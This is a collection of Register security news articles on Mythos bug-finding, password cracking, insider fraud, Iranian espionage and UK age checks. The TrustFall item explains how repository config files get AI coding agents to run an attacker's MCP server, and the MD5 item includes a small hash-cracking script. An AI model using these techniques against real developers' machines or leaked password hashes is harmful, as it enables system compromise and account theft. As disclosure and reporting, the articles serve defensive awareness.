However, we and others in the tech industry believe its decisions on the methodology to calculate fees and potential fines are disproportionate. We believe fees and penalties should be based on the services being regulated in the countries they're being regulated in. This would still allow Ofcom to impose the largest fines in UK corporate history." The case marks the latest flare-up between Silicon Valley and Britain over the Online Safety Act, which has already triggered complaints from US politicians, free speech campaigners, and tech firms unhappy about the scale of Ofcom’s new powers. The regulator has not been shy about flexing them either. It has already threatened action against Elon Musk's X over sexually explicit AI-generated images linked to Grok and, in March, issued its first fine under the regime against 4chan. Meta appears to have looked at where that enforcement road leads and decided now was the time to argue about the math. ®

Mozilla boasts Mythos boosted Firefox bug cull

The Register - Fri, 08/05/2026 - 00:32
Mozilla fixed 423 Firefox security bugs in April, a repair rate more than five times higher than the 76 fixes issued in March and almost 20 times higher than its 21.5 monthly average last year. The browser maker previously said Anthropic's ballyhooed Mythos Preview model found 271 of these in Firefox 150. Now, a trio of technical types has come forward to provide a bit more detail about what Mythos (and its less storied sibling Opus 4.6) actually found. But they also highlight something that may matter more than the model: the agentic harness – the middleware mediating between AI and the end user. Brian Grinstead, Firefox distinguished engineer, Christian Holler, Firefox tech lead, and Frederik Braun, head of the Firefox security team, observe that over the past few months, AI-generated security reports have gone from slop to rather more tasty. They attribute the transformation to better models and development of better ways of harnessing those models – steering them in a way that increases the ratio of signal to noise. But they also appear to be aware that there's some skepticism in the security community about Mythos. So they've decided to publicize selected wins in an effort to encourage others to jump aboard the AI bug remediation train. "Ordinarily we keep detailed bug reports private for several months after shipping fixes and issuing security advisories, largely as a precaution to protect any users who, for whatever reason, were slow to update to the latest version of Firefox," they said. "Given the extraordinary level of interest in this topic and the urgency of action needed throughout the software ecosystem, we’ve made the calculated decision to unhide a small sample of the reports behind the fixes we recently shipped." The post links to a dozen Firefox bugs with varying degrees of severity. 
The list includes, for example, a 20-year-old heap use-after-free bug (high severity) that a web page could trigger using the XSLTProcessor DOM API without any user interaction. Many of these bugs are sandbox escapes, they note, which are difficult to find using techniques like fuzzing. AI analysis, they say, helps provide broader security coverage. And they add that it has helped validate prior browser hardening work designed to prevent prototype pollution attacks – audit logs showed AI models making unsuccessful exploitation attempts using this technique. Following Anthropic's announcement of Project Glasswing – a program for companies to gain early access to Mythos because it's touted as too dangerous for public release – security experts expressed skepticism. For example, Davi Ottenheimer, president of security consultancy flyingpenguin, wrote in an April 13 blog post, "The supposedly huge Anthropic 'step change' appears to be little more than a rounding error. The threat narrative so far appears to be ALL marketing and no real results. The Glasswing consortium is regulatory capture dressed up poorly as restraint." He subsequently ran a test in which he strapped Anthropic's lesser models Sonnet 4.6 and Haiku 4.5 into a harness called Wirken with an auditing skill called Lyrik. The result was eight findings in two minutes at a cost of about $0.75, Ottenheimer claims, noting that two of the eight matched bugs Mythos had identified. Other security folk have also reported that bug hunting and exploit development can be quite productive with off-the-shelf models like Opus 4.6, which among other virtues costs about a fifth as much as Mythos. In an email to The Register, Ottenheimer said, "There's a fundamental philosophical failure in the Mozilla post. A reading and a measurement are not the same thing. I don't see a measurement, but they seem to want us to believe we're looking at one. "When they give us the 'behind the scenes math' it's circular, a trick.
'Mythos found 271 bugs' is what Mythos found, not what other tools could not find against the same code. Why leave it as an assumption if it can be proven?" Ottenheimer said Mozilla advocates that every project adopt a similar approach without proving the merits of that approach. "It's like saying if you don't drink Coca-Cola, you can't run a mile under six minutes, because that's what a guy sponsored by Coca-Cola just did," he said. "The bar moves on rhetoric, marketing, not proper evidence. That is the capture crew again." He notes that the merits of Mythos might be more convincing if Mozilla had reported they couldn't do this work without Mythos. And since they're not saying that, he suggests, it's worth asking why there's no transparent comparison of Mythos to other models. He points to Mozilla's admission that Opus 4.6 was already identifying "an impressive amount of previously unknown vulnerabilities." "Mozilla never quantifies what Opus 4.6 [did] before saying what Mythos added," he said. "So 271 attributed to Mythos doesn't fit the analysis. And there's a deeper reveal when they say 'we dramatically improved our techniques for harnessing these models.' The improvement may be entirely in the harness, not as much in the model. This maps to my own experience. A nail gun has advantages over the hammer, yet without being in the right hands the outputs are as bad or worse." ®

Anthropic response to 1-click pwn: Shouldn't have clicked 'ok'

The Register - Thu, 07/05/2026 - 21:03
How explicit does the maker of a footgun need to be about the product's potential to shoot you in the foot? That's essentially the question security firm Adversa AI is asking with the disclosure of a one-click remote code execution attack via an MCP server in Claude Code, Gemini CLI, Cursor CLI, and Copilot CLI. The TrustFall proof-of-concept attack demonstrates how a cloned code repository can include two JSON files (.mcp.json and .claude/settings.json) that open the door to an attacker-controlled Model Context Protocol (MCP) server. MCP servers make tools, configuration data, schemas, and documentation available in a standard format to AI models via JSON. The vulnerability arises from inconsistent restrictions governing the scope of settings: Anthropic blocks some dangerous settings at the project level (e.g. bypassPermissions) but not others (e.g. enableAllProjectMcpServers and enabledMcpjsonServers). The JSON files simply enable those settings. "The moment a developer presses Enter on Claude Code's generic 'Yes, I trust this folder' dialog, the server spawns as an unsandboxed Node.js process with the user's full privileges — no per-server consent, no tool call from Claude required," Adversa AI explains in its PoC repo. The likely result is a compromised system. The PoC has been demonstrated in a video. It worked on Claude Code CLI v2.1.114, as of May 2. Other agent CLIs are also said to be affected, but specific PoCs have not been published. "It's the third CVE in Claude Code in six months from the same root cause (project-scoped settings as injection vector)," Alex Polyakov, co-founder of Adversa AI, told The Register in an email. "Each gets patched in isolation but the underlying class hasn't been finally fixed. Most developers don't know these settings exist, let alone that a cloned repo can set them silently." Anthropic, according to the security biz, contends that the user's trust decision moves the issue outside its threat model.
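The project-scoped-settings problem is easy to check for yourself: before trusting a freshly cloned folder, the two JSON files can be scanned for the auto-enable flags the disclosure names. Below is a minimal defensive sketch in Python; the file paths and key names come from the report, while the function itself is illustrative, not an Adversa or Anthropic tool:

```python
import json
from pathlib import Path

# Settings the disclosure says are blocked (bypassPermissions) or NOT blocked
# (the two MCP auto-enable flags) when set at the project level.
RISKY_KEYS = {"bypassPermissions", "enableAllProjectMcpServers", "enabledMcpjsonServers"}

def audit_repo(repo: str) -> list[str]:
    """Flag project-scoped config files that try to auto-enable MCP servers."""
    findings = []
    for rel in (".mcp.json", ".claude/settings.json"):
        path = Path(repo) / rel
        if not path.is_file():
            continue
        try:
            data = json.loads(path.read_text())
        except (OSError, json.JSONDecodeError):
            findings.append(f"{rel}: unreadable or malformed JSON")
            continue
        hits = RISKY_KEYS & set(data) if isinstance(data, dict) else set()
        # .mcp.json declaring servers is what the settings flags would auto-trust
        if rel == ".mcp.json" and isinstance(data, dict) and "mcpServers" in data:
            hits.add("mcpServers")
        for key in sorted(hits):
            findings.append(f"{rel}: sets {key}")
    return findings
```

Run against a just-cloned repo, an empty result means neither file attempts the TrustFall trick; any finding is worth reading before pressing Enter on the trust dialog.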
CVE-2025-59536 was considered a vulnerability because it triggered automatically when a user started up Claude Code in a malicious directory. TrustFall, however, is considered out of scope because the user has been presented with a dialog box and made a trust decision. Adversa argues that the decision is not being made with informed consent, citing a prior, more explicit warning notice that was removed in v2.1 of the Claude Code CLI. "The pre-v2.1 dialog explicitly warned that .mcp.json could execute code and offered three options including 'proceed with MCP servers disabled,'" writes Adversa's Sergey Malenkovich. "That informed-consent UX was removed. The current dialog defaults to 'Yes, I trust this folder' with no MCP-specific language, no enumeration of which executables will spawn, and no opt-out for MCP while keeping the rest of the trust grant." Then there's the zero-click variant to consider for CI/CD pipelines that implement Claude Code. When Claude Code is invoked in CI/CD, that happens via SDK rather than the interactive CLI. So there's no terminal prompt. Malenkovich argues that Anthropic should make three changes. First, block enableAllProjectMcpServers, enabledMcpjsonServers, and permissions.allow from any settings file inside a project. The idea is that a malicious repository should not be able to approve its own servers. Second, implement a dedicated MCP consent dialog that defaults to "deny." And third, require interactive consent per server rather than for all servers. Anthropic did not respond to a request for comment. ®

60% of MD5 password hashes are crackable in under an hour

The Register - Thu, 07/05/2026 - 17:47
It’s World Password Day, and there’s really no better way to celebrate than with news that a majority of supposedly secure password hashes can be cracked with a single GPU in less than an hour, some in less than a minute. Using a dataset of more than 231 million unique passwords sourced from dark web leaks - including 38 million added since its previous study - and hashing them with MD5, researchers at security firm Kaspersky found that, using a single Nvidia RTX 5090 graphics card, 60 percent of passwords could be cracked in less than an hour, and a full 48 percent in under 60 seconds. Sure, that’s not exactly your run-of-the-mill desktop graphics processor given its price, but it highlights an important point: It takes surprisingly little to crack the average password hash. Aspiring cybercriminals don’t even really need their own 5090, Kaspersky notes, as they can easily rent one from a cloud provider and crack hashes for a few bucks. The bottom line is that passwords protected only by fast hashing algorithms such as MD5 are no longer safe if attackers obtain them in a data breach. “One hour is all an attacker needs to crack three out of every five passwords they’ve found in a leak,” Kaspersky noted. Much of the reason password hashes have become so easy to crack is password predictability. Per Kaspersky, its analysis of more than 200 million exposed passwords revealed common patterns that attackers can use to optimize cracking algorithms, significantly reducing the time needed to guess the character combinations that grant access to target accounts. In case you’re wondering whether there’s a trend to compare this to, Kaspersky ran a prior iteration of this study in 2024, and bad news: Passwords are actually a bit easier to crack in 2026 than they were a couple of years ago. Not by much, mind you - only a few percent - but it’s still a move in the wrong direction. 
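The economics Kaspersky describes follow directly from MD5 being a fast hash: an attacker holding a leaked hash simply recomputes MD5 over candidate passwords until one matches, trying common leaked passwords first and brute force second. A toy sketch of that loop, assuming nothing beyond Python's standard library (real rigs like hashcat run billions of such guesses per second on a GPU):

```python
import hashlib
from itertools import product
from string import ascii_lowercase

def md5_hex(pw: str) -> str:
    # One fast, unsalted hash per guess is exactly why MD5 cracks so quickly
    return hashlib.md5(pw.encode()).hexdigest()

def crack(target: str, wordlist: list[str], max_brute_len: int = 4):
    """Try leaked/common passwords first, then short lowercase brute force."""
    for word in wordlist:  # dictionary phase
        if md5_hex(word) == target:
            return word
    for n in range(1, max_brute_len + 1):  # brute-force phase
        for combo in product(ascii_lowercase, repeat=n):
            cand = "".join(combo)
            if md5_hex(cand) == target:
                return cand
    return None
```

The fix on the defender's side is not a longer wordlist but a deliberately slow, salted, memory-hard hash (bcrypt, scrypt, or Argon2), which turns billions of guesses per second into thousands.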
“Attackers owe this boost in speed to graphics processors, which grow more powerful every year,” Kaspersky explained. “Unfortunately, passwords remain as weak as ever.” How about a World Let’s-Stop-Relying-On Passwords Day? News of the death of the password has, unfortunately, been greatly exaggerated in the past couple of decades, yet most of us still rely on them multiple times a day. It likely won’t surprise El Reg readers to learn that us vultures are inundated with pitches for events like World Password Day, and most of them received this year had the same takeaway: We really need to get a move on with ditching passwords, or, at the very least, rethinking our security paradigms. Chris Gunner, a CISO-for-hire at managed service provider giant Thrive, told us in emailed comments that there’s no reason to ditch passwords entirely, but they need to be just one part of a broader identity-based security strategy. “Even a strong password can be undermined if the wider identity and access environment is not properly managed,” Gunner said. Passwords should be paired with a second factor, preferably biometric, said Gunner, because it’s the most difficult for hackers to bypass. “MFA controls should then be joined by identity governance and endpoint protection so gaps between systems are reduced,” Gunner added, recommending that a broader zero trust model be established as well, restricting lateral movement possibilities via a compromised account. Senior IEEE member and University of Nottingham cybersecurity professor Steven Furnell said that World Password Day messaging shouldn’t stop at telling people to improve their personal security posture either. Passwords aren’t going anywhere for a long while, Furnell explained in an email, and inconsistent adoption of new security technologies will mean users will be left at risk as certain providers fail to adapt. 
“Many sites and services still don’t offer passkey support, so users will find themselves with a mixed login experience,” Furnell explained. “While some might argue that it’s the user’s responsibility to protect themselves properly, they need to know how to do it.” The professor noted that, in many cases, users aren’t told how to create a good modern password, and in other cases, sites simply don’t enforce adequate password requirements to make passwords secure, to the degree that they can be made so. “This World Password Day, the main message ought not to be to the users, who often have no choice but to use passwords anyway, but to the sites and providers that are requiring them to do so,” Furnell told us. You heard the man - time to upgrade that user security stack. No matter how safe you think those passwords might be, with their complex requirements and proper hashed storage, it probably won’t take too long for someone to break in, making it an organizational responsibility to ensure there’s yet another locked door behind the first one. ®

The network password was a key plot point in one of the most famous movies of all time

The Register - Thu, 07/05/2026 - 10:49
PWNED Welcome back to PWNED, the weekly column where we turn a white-hot spotlight onto the cracks and crevices in company security and write about those who have let their guard down, often in the name of convenience, incompetence, or just plain laziness. Today’s tale of woe concerns the need to secure a network and the dangers of an insecure password. Our story comes courtesy of Roger Grimes, CISO advisor at security firm KnowBe4. He recounts a time when he had to get into a client’s network but didn’t have the credentials. Grimes was installing accounting software for a client and, as a result, needed to take the network down for a day. To make sure that he didn’t disturb any work, he decided to log into the system on a Saturday. Unfortunately, he was missing the admin password he needed to uninstall old software and add the new app. Since it was the weekend, no one was answering their work phones to give him the information he needed, and there was a good chance he would have to delay the upgrade until the following weekend. Grimes could have given up right there, but he had an idea. Why not try to figure out what the password was? The situation reminded him of a movie. “You know, the scene where the hacker is sitting at the terminal trying to log on, but the victim refuses to give up credentials. So the hacker starts typing random passwords out of thin air,” he said. “And wouldn’t you know it? They correctly guess the password at the last possible moment.” After trying numerous passwords, the advisor thought about a famous movie he had just watched: Citizen Kane. He decided to try “rosebud,” and voilà. (This vulture can identify with the Orson Welles focus, having just watched The Third Man this week.) It’s a good thing that it was Grimes, a legit contractor, guessing passwords instead of some miscreant. Picking a password from a movie plotline is a bad idea and, in this case, made even worse by the lack of numbers, capital letters, or symbols in the password.
If you’re picking out a password, you might be better off generating a strong password that’s a string of random numbers and letters and then having it remembered by a password manager. Then, for the password manager itself, consider a passphrase that contains capital letters, symbols, and numbers such as “Shoe-Please6-Wrapped-Carbon-Wear” so you can try to remember it. You might also use a passphrase for your admin password – you can generate a random one using Keeper’s Passphrase Generator. Have a story about someone leaving a gaping hole in their network? Share it with us at pwned@sitpub.com. Anonymity available upon request. ®
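The passphrase pattern suggested above - capitalized words, a digit worked in, hyphen separators - can be produced with Python's `secrets` module, which draws from the OS's cryptographic randomness rather than the guessable `random` module. This is an illustrative sketch, not the generator named above, and the tiny wordlist is a stand-in (a real tool would use a large list such as EFF's diceware words):

```python
import secrets

# Stand-in wordlist; real generators use thousands of words for enough entropy
WORDS = ["shoe", "please", "wrapped", "carbon", "wear", "orbit", "velvet", "quartz"]

def passphrase(n_words: int = 5) -> str:
    """Join randomly chosen capitalized words with hyphens,
    appending one random digit to one randomly chosen word."""
    words = [secrets.choice(WORDS).capitalize() for _ in range(n_words)]
    lucky = secrets.randbelow(n_words)      # which word gets the digit
    words[lucky] += str(secrets.randbelow(10))
    return "-".join(words)
```

With an eight-word list this is far too guessable for real use; the point is the shape of the approach, and that `secrets` (not `random`) is the right source of randomness for anything security-related.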

Arctic Wolf kicks 250 employees out of the pack to save money for AI

The Register - Wed, 06/05/2026 - 19:20
Cybersecurity vendor Arctic Wolf has laid off 250 workers in a restructuring that it says is designed to position the company to invest more in AI through its superintelligence platform and agentic Security Operations Center (SOC), a company spokesperson told The Register. “We recently made an organizational restructuring to better align the company’s structure and investments with our long‑term strategy,” a spokesperson said. “While these decisions are difficult, they position Arctic Wolf to operate more efficiently, continue investing in our Superintelligence platform and Agentic SOC, and deliver strong value to customers. We remain confident in our direction and momentum.” The layoffs appear to represent less than 10 percent of the total workforce. Arctic Wolf is a privately held company and does not publish a current headcount, but in December 2024, the company said it employed more than 2,600 workers, according to a press release it issued at the time. According to the website PitchBook, Arctic Wolf has 3,323 employees. The job cuts appeared to fall across several categories including sales, product development, and marketing. Some had been with the company for four years or more in revenue-generating roles such as sales engineer. One senior systems engineer with experience in datacenter infrastructure and cyber threat detection said on LinkedIn he was let go after more than a year with the company. “Wow! I was not expecting to have such a swing in posts this week from super positive to negative. Today I was laid off by Arctic Wolf due to restructuring,” wrote one sales engineer the day after he wrote a post about the success they had experienced last year. Alongside its five global SOCs, Arctic Wolf has offices in Waterloo, Ontario; San Antonio, Texas; Eden Prairie, Minnesota; Bengaluru, India, and other locations worldwide. 
Arctic Wolf operates in crowded endpoint detection and response (EDR) and managed detection and response (MDR) markets alongside CrowdStrike, Rapid7, and SentinelOne. It also competes for channel partners and customers with the likes of Huntress and Blackpoint Cyber. The company has bet on its Aurora Superintelligence Platform, which combines security data, a "Swarm of Experts" set of AI agents, and humans in the loop to protect customers' systems. ®

1 in 8 employees totally cool with selling work credentials

The Register - Wed, 06/05/2026 - 18:58
You can't trust anyone these days! Get together with seven of your colleagues, and there’s a decent chance one of the eight will say they’ve either sold company login details in the past year or know someone who has, says UK fraud prevention outfit Cifas. That 13 percent figure is shocking. Just as strikingly, Cifas found a similar 13 percent of employees overall believed selling access to company systems was justifiable, though the org’s Workplace Fraud Trends report did not spell out those justifications. Regardless, Cifas says it suggests that there’s a worrying shift happening in attitudes toward insider-enabled fraud that should trouble leadership. Then again, leadership might not be too worried based on the data. Cifas doesn’t give a precise number for the share of rank-and-file employees who feel selling credentials is justified, but it does call attention to how leadership feels, and the more power they have, the more they seem to think it’s okay to sell their access. Thirty-two percent of managers, 36 percent of directors, and 43 percent of C-suite executives said it was justifiable to sell their login details. Even more shockingly, a full 81 percent of business owners felt the exact same way. As for why, that’s not entirely clear, though Cifas told us it’s heard various excuses in the past. Financial challenges, the belief it would be a harmless one-off, confidence they wouldn’t get caught, and disgruntlement were among the reasons cited for selling credentials. If you’re wondering who to keep an eye on, Cifas suggests looking at IT and telecoms professionals, who showed the highest tolerance for fraud-related behavior across multiple scenarios covered in the study. Those scenarios included the aforementioned selling of login details, as well as secretly moonlighting for a competitor, using fraudulent references on job applications, expense fraud, and the like.
Selling access to company systems was one of the less common types of fraud covered in the survey, but the 13 percent figure reflects respondents who said they had done it or knew someone who had - meaning that, in a company of 1,000 people, around 130 might report direct or indirect exposure to the behavior. The fact that leadership respondents and IT and telecoms professionals showed higher tolerance for such activity makes the findings more concerning, even if the survey focused specifically on selling login details, in some cases to a former colleague. This data is specific to the UK, mind you, but there’s no reason to assume a relaxed attitude toward such a critical cybersecurity weakness is confined to the Isles - that’s about as likely as the person buying those credentials keeping them to themselves. When asked if Cifas had comparable data from prior years to compare this to, the organization described its findings as revealing “a worrying shift in attitudes toward insider-enabled fraud.” However, the firm said that this is the first year it compiled this report, so it doesn’t have comparable data. Nonetheless, Cifas Director of Learning Rachael Tiffen said in a press release that the point is that organizations need to be aware of how many employees might be willing to sell access to company systems. “These findings show how vital it is for organisations to build fraud‑aware cultures, where employees at all levels understand their responsibilities and the consequences of their actions,” Tiffen said. Be sure to pay them well, too. ®

Iran cybersnoops still LARPing as ransomware crooks in espionage ops

The Register - Wed, 06/05/2026 - 17:03
Researchers at Rapid7 say that they have spotted what they believe was an Iranian intelligence cyber unit masquerading as the Chaos ransomware gang to hide a state-sponsored espionage operation. The intrusion was spotted earlier this year, and investigators say breadcrumbs left behind give them "medium confidence" in saying it was the work of MuddyWater, which has been linked to intrusions affecting Western government and banking networks in recent months. Attackers began with a Microsoft Teams phishing campaign, which is not uncommon. They also encouraged targets to share their screens. Again, it was nothing too out of the ordinary. However, what must have required some expert persuasion work was that they convinced these individuals to enter their credentials into local text files, and even modify MFA settings to allow attacker-controlled devices to complete authentication. Rapid7 researchers Alexandra Blia and Ivan Feigl wrote: "While connected, the [threat actor (TA)] executed basic discovery commands, accessed files related to the victim's VPN configuration, and instructed users to enter their credentials into locally-created text files. "In at least one instance, the TA also deployed a remote management tool (AnyDesk) to further facilitate access." From there, browser artifacts suggested that attackers lifted credentials through phishing pages. At least one mimicked a Microsoft Quick Assist page. Armed with valid credentials, the attackers then executed various commands via RDP, which downloaded payloads using curl. These payloads included a backdoor malware dubbed Darkcomp, a malicious Microsoft WebView2 loader to disguise traffic, and an encrypted configuration file that sent instructions to Darkcomp. Then it was a case of performing lateral movement by using additional compromised accounts and scooping up sensitive data along the way. 
The attackers used the same accounts to send emails internally notifying organization leaders about the intrusion and data theft, and included an onion link leading to Chaos ransomware’s data leak site (DLS), where a corresponding entry appeared with all data redacted and hidden behind a countdown timer. Follow-up emails aimed to build the illusion of a genuine ransomware attack, although the illusion was short-lived. The attackers instructed recipients to look for a file containing "access credentials" they could use to begin ransom negotiations. Unlike the plaintext credential files the attackers had socially engineered the original targets into creating, this file did not actually exist. There was no way to contact the attackers, whereas in a typical scenario the intruders would be looking for a payout. There was also no file encryption, which is inconsistent with Chaos affiliates' typical way of working. "Despite these inconsistencies in the initial proof-of-compromise, the TA later published the stolen data on its DLS in line with modern extortion tactics," Blia and Feigl wrote. "The leaked data was assessed to be legitimate." If not for financial gain, then what? MuddyWater – if that is indeed the group behind this – did not extort the organizations in question, nor did they deploy a ransomware payload, but they did pose as an established ransomware group. Rapid7 believes the group did this as an extension of its false-flag operations to provide a plausible front for cyberespionage activity, or preposition work to underpin potential destructive cyberattacks. It wouldn't be the first time MuddyWater or Iranian intelligence (MOIS) was found LARPing as a ransomware crew. Both have previously been linked to an attack on an Israeli hospital, allegedly carried out by a Qilin affiliate. 
"Following the subsequent public attribution of that incident to the MOIS, it is plausible that the group adopted alternative ransomware branding, in this case Chaos, in an effort to reduce attribution risk and maintain a degree of plausible deniability," said the researchers. The unique benefits of masquerading as ransomware crooks include muddying attribution for attacks by leaving behind ransomware breadcrumbs, as well as redirecting defensive efforts toward locating signs of ransomware deployment instead of the backdoors that underpin espionage activity. ®
Categories: News

UK age-gating plans risk breaking the internet, privacy groups warn

The Register - Wed, 06/05/2026 - 14:03
Privacy groups, VPN providers, and civil liberties outfits have lined up to warn the UK government that its latest plan to slap age gates across swathes of the internet risks breaking the web while doing little to keep kids safe.

In a joint statement, signatories including the Electronic Frontier Foundation, Mozilla, the Open Rights Group, Proton, and the Tor Project took aim at proposals now moving forward after the Children's Wellbeing and Schools Bill cleared Parliament, with access to some platforms, services, and specific features potentially restricted by age checks. "The open internet is a global public resource that has long since become foundational to the flourishing of individuals, businesses, and societies," the letter states, warning that "this openness and the opportunities it affords are coming under threat in the UK."

Ministers are now consulting on measures that could include curfews for younger users and restrictions across services ranging from games and VPNs to static websites. The signatories say that will quickly turn into a system where everyone, not just children, has to prove their age to get full access. "Implementing such access restrictions hinges on all users having to verify their ages, not just young people," the letter warns, adding that the approach "focuses on restricting young people's access, rather than ensuring services are designed to uphold their rights and interests by default."

Early results are not exactly inspiring. It's been months since tougher checks under the Online Safety Act began rolling out, and some systems have already been fooled by little more than a drawn-on mustache, raising questions about how effective the tech really is at keeping minors out. This hasn't gone unnoticed.
"Existing age assurance technologies are either insufficiently accurate, undermine privacy and data security, or are not widely available across populations," the letter says, warning that rolling them out broadly "creates serious new security threats." It is not just a privacy headache either: the groups argue the policy could tilt the market further toward Big Tech. Mandating checks across more services risks "cementing the dominance of gatekeeper app stores, operating systems, and platforms' walled gardens," while turning the web into "a patchwork of age-gated jurisdictions."

Instead of doubling down on access controls, the groups argue policymakers are targeting the wrong problem. "These risks are real and require thoughtful policy interventions that address the root of the issue, not just simplistic policies like access bans," the letter says, pointing to business models built on "massive collection of user data" as a bigger driver of harm. The closing line does not leave much room for interpretation: "Now is the time to hold tech to account, not undermine the open internet." ®
Categories: News

India orders infosec red alert in case Mythos sparks crime spree

The Register - Wed, 06/05/2026 - 03:32
India’s Securities and Exchange Board has advised participants in the nation’s equities industry to immediately revisit their information security systems and practices, in case Anthropic’s Mythos bug-finding AI sparks a cyberattack spree. The Board is India’s equivalent of the USA’s Securities and Exchange Commission, or the UK’s Financial Conduct Authority. On Tuesday, the Indian regulator issued an advisory warning that AI-led vulnerability detection models such as Mythos could fuel attacks at scale.

In response to those threats, the Board has established a taskforce that will examine the risks posed by models like Mythos, share threat intelligence, report incidents, and initiate a review of cybersecurity at third-party software vendors who supply the regulator and the entities it oversees. The advisory also offers some basic infosec advice: ensure patches are up to date, conduct audits of potential vulnerabilities, inventory APIs and secure them, run a serious SOC and take its advice, and harden systems by adopting principles such as zero-trust networking and running only essential services.

The regulator also told participants in India’s equities markets to have their IT committees issue guidance on how to mitigate risks created by AI-led vulnerability detection models, then develop a plan to use AI as part of their infosec armoury. “Also, undertake other measures including recalibration of risks for AI accelerated threats, AI-augmented SOC transformation, and continuous vulnerability management using AI tools,” the advisory states.

The Board directed the above advice at 19 different classes of company, ranging from venture capitalists to merchant bankers, mutual funds, stock exchanges, and even niche suppliers such as agencies that store know-your-customer information. Other regulators around the world have also acknowledged the risks Mythos poses. US Treasury Secretary Scott Bessent convened an emergency meeting with the nation’s banks a few weeks back.
Singaporean regulators did likewise yesterday. Australian regulators sent local banks a strongly worded reminder that they must develop AI strategies that consider the risks the technology creates. Hong Kong’s Monetary Authority is working on new infosec guidance for the age of Mythos. India’s approach stands out for effectively putting the entities it regulates on alert for an imminent threat and ordering them to take action to prevent problems. ®
Categories: News

